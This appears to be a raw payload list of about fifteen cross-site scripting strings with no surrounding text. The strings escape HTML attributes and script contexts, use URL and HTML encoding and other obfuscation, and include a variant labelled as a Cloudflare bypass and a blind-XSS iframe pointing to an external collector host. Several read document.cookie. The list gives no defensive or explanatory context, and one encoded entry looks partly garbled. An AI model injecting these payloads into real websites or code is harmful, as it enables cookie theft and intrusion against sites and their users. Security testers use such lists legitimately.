"-top['al\x65rt']('XD')-"
orwa%27"><svg/onload=alert(document.cookie)>
"><script>alert(1)</script>
1%27%22()%26%25%3Czzz%3E%3CScRiPt%20%3Ealert(1)%3C/ScRiPt%3E
javascript:var{a:onerror}={a:%2561lert};throw%20origin
<script>alert(1)</script>
'});alert(document.cookie);</script>
<img src=x onerror=alert('XSS')>
"></a></td></tr></table><script>prompt('ijustcopypastelikeanoob');</script></html>//
'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o
1%27;--<img%20src=x%20onerror=javascript:alert(document.domain)> 
'-alert?.(1)-'
"><iframesrcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#118;#116;&#116;&#112;&#115;&#58;&#47;&#47;test.bxss.in&#34;&#59;&#117;&#109;&#101;&#110;&#116;&#46;&#62;">
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
